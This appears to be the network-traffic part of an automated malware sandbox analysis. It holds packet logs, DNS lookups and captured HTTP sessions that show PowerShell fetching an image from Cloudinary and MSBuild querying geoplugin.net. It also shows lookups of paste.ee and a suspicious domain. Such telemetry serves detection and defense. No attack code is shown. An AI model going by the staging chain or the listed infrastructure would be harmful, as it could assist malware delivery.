                                                                                                                      Dec 9, 2024 16:34:25.321269035 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.321306944 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.321329117 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.345623970 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.345650911 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.345717907 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.345741034 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.345776081 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.345796108 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.358597040 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.358627081 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.358675957 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.358705044 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.358728886 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.358755112 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.367650986 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.367671013 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.367710114 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.367723942 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.367759943 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.381386995 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.381416082 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.381465912 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.381490946 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.381515980 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.381584883 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.389383078 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.389403105 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.389478922 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.389492989 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.389591932 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.400405884 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.400428057 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.400516987 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.400542021 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.400595903 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.502408981 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.502512932 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.502535105 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.502598047 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.508429050 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.508488894 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.508508921 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.508526087 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.508552074 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.508568048 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.516632080 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.516671896 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.516860008 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.516882896 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.517287970 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.526657104 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.526679039 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.526740074 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.526757956 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.526789904 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.526823997 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.531378031 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.531397104 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.531446934 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.531460047 CET44349761150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.531522036 CET49761443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.540399075 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.540417910 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:25.540477991 CET49760443192.168.2.6150.171.27.10
                                                                                                                      Dec 9, 2024 16:34:25.540488005 CET44349760150.171.27.10192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.913847923 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.917948008 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.917964935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.918056011 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.926486969 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.926693916 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.934937954 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.935064077 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.935081959 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.935261965 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.942368984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.942466021 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.948873997 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.948988914 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.952215910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.952425957 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.958687067 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.958750963 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.964999914 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.965061903 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.971429110 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.971534014 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.075336933 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.075452089 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.078063965 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.078145981 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.083183050 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.083260059 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.088191986 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.088253975 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.090913057 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.090972900 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.095429897 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.095499039 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.099899054 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.099952936 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.104495049 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.104566097 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.106885910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.106961012 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.111752033 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.111819029 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.113881111 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.113959074 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.121243000 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.121311903 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.123421907 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.123491049 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.128134012 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.128205061 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.131596088 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.131655931 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.136254072 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.136311054 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.138732910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.138802052 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.143114090 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.143214941 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.145553112 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.145601988 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.150295019 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.150363922 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.155461073 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.155522108 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.266480923 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.266621113 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.267379999 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.267455101 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.271372080 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.271477938 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.274602890 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.274701118 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.276735067 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.276832104 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.280103922 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.280198097 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292608976 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292623997 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292659044 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292730093 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292741060 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292768002 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292793036 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.301501989 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301548004 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301614046 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.301628113 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301641941 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.312259912 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.312288046 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.312406063 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.312434912 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323765039 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323795080 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323899031 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.323934078 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336188078 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336211920 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336272955 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.336304903 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336319923 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.339560986 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.339610100 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.348577976 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348607063 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348664045 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.348691940 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348706961 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.391657114 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.464013100 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464071989 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464132071 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.464162111 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464188099 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.465715885 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.472142935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472167015 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472266912 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.472294092 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472337008 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.481657028 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481688023 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481807947 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.481834888 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481878042 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.490817070 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.490844011 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.490941048 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.490967035 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.491010904 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.498907089 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.498943090 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.499047995 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.499059916 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.499102116 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.508696079 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508723974 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508819103 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.508829117 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508872986 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.516680956 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516700983 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516788960 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.516815901 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516853094 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.525913954 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.525940895 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.526009083 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.526026011 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.526060104 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.526074886 CET49772443192.168.2.6172.67.187.200
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 9, 2024 16:34:04.253113985 CET | 64541 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 9, 2024 16:34:04.563345909 CET | 53 | 64541 | 1.1.1.1 | 192.168.2.6 |
| Dec 9, 2024 16:34:14.187222004 CET | 53245 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 9, 2024 16:34:27.473082066 CET | 56772 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 9, 2024 16:34:27.831240892 CET | 53 | 56772 | 1.1.1.1 | 192.168.2.6 |
| Dec 9, 2024 16:34:31.241107941 CET | 52911 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 9, 2024 16:34:31.572860956 CET | 53 | 52911 | 1.1.1.1 | 192.168.2.6 |
| Dec 9, 2024 16:34:34.222373962 CET | 57515 | 53 | 192.168.2.6 | 1.1.1.1 |
| Dec 9, 2024 16:34:34.364759922 CET | 53 | 57515 | 1.1.1.1 | 192.168.2.6 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 9, 2024 16:34:04.253113985 CET | 192.168.2.6 | 1.1.1.1 | 0xda1 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:14.187222004 CET | 192.168.2.6 | 1.1.1.1 | 0xcf59 | Standard query (0) | tse1.mm.bing.net | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:27.473082066 CET | 192.168.2.6 | 1.1.1.1 | 0x157e | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:31.241107941 CET | 192.168.2.6 | 1.1.1.1 | 0x67b | Standard query (0) | rem.pushswroller.eu | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:34.222373962 CET | 192.168.2.6 | 1.1.1.1 | 0xb9f6 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 9, 2024 16:33:57.613066912 CET | 1.1.1.1 | 192.168.2.6 | 0xa0ae | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:33:57.613066912 CET | 1.1.1.1 | 192.168.2.6 | 0xa0ae | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:33:59.987168074 CET | 1.1.1.1 | 192.168.2.6 | 0xfa3f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:33:59.987168074 CET | 1.1.1.1 | 192.168.2.6 | 0xfa3f | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:04.563345909 CET | 1.1.1.1 | 192.168.2.6 | 0xda1 | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:34:04.563345909 CET | 1.1.1.1 | 192.168.2.6 | 0xda1 | No error (0) | cloudinary.map.fastly.net | | 151.101.1.137 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:04.563345909 CET | 1.1.1.1 | 192.168.2.6 | 0xda1 | No error (0) | cloudinary.map.fastly.net | | 151.101.65.137 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:04.563345909 CET | 1.1.1.1 | 192.168.2.6 | 0xda1 | No error (0) | cloudinary.map.fastly.net | | 151.101.129.137 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:04.563345909 CET | 1.1.1.1 | 192.168.2.6 | 0xda1 | No error (0) | cloudinary.map.fastly.net | | 151.101.193.137 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:06.932796001 CET | 1.1.1.1 | 192.168.2.6 | 0x74b7 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:34:06.932796001 CET | 1.1.1.1 | 192.168.2.6 | 0x74b7 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:14.616420031 CET | 1.1.1.1 | 192.168.2.6 | 0xcf59 | No error (0) | tse1.mm.bing.net | mm-mm.bing.net.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:34:14.616420031 CET | 1.1.1.1 | 192.168.2.6 | 0xcf59 | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:14.616420031 CET | 1.1.1.1 | 192.168.2.6 | 0xcf59 | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:18.432468891 CET | 1.1.1.1 | 192.168.2.6 | 0xc838 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:34:18.432468891 CET | 1.1.1.1 | 192.168.2.6 | 0xc838 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:27.831240892 CET | 1.1.1.1 | 192.168.2.6 | 0x157e | No error (0) | paste.ee | | 172.67.187.200 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:27.831240892 CET | 1.1.1.1 | 192.168.2.6 | 0x157e | No error (0) | paste.ee | | 104.21.84.67 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:31.572860956 CET | 1.1.1.1 | 192.168.2.6 | 0x67b | No error (0) | rem.pushswroller.eu | | 45.80.158.30 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:34.364759922 CET | 1.1.1.1 | 192.168.2.6 | 0xb9f6 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:38.228648901 CET | 1.1.1.1 | 192.168.2.6 | 0x9593 | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 9, 2024 16:34:38.228648901 CET | 1.1.1.1 | 192.168.2.6 | 0x9593 | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false |
| Dec 9, 2024 16:34:38.228648901 CET | 1.1.1.1 | 192.168.2.6 | 0x9593 | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false |
• res.cloudinary.com
• paste.ee
• geoplugin.net
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49790 | 178.237.33.50 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Timestamp: Dec 9, 2024 16:34:34.492017984 CET, 71 bytes transferred, direction OUT:
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Timestamp: Dec 9, 2024 16:34:35.733115911 CET, 1171 bytes transferred, direction IN:
HTTP/1.1 200 OK
date: Mon, 09 Dec 2024 15:34:35 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID:0
Source IP:192.168.2.6
Source Port:49714
Destination IP:151.101.1.137
Destination Port:443
PID:2020
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp:2024-12-09 15:34:05 UTC
Bytes transferred:127
Direction:OUT
Data:
GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
Host: res.cloudinary.com
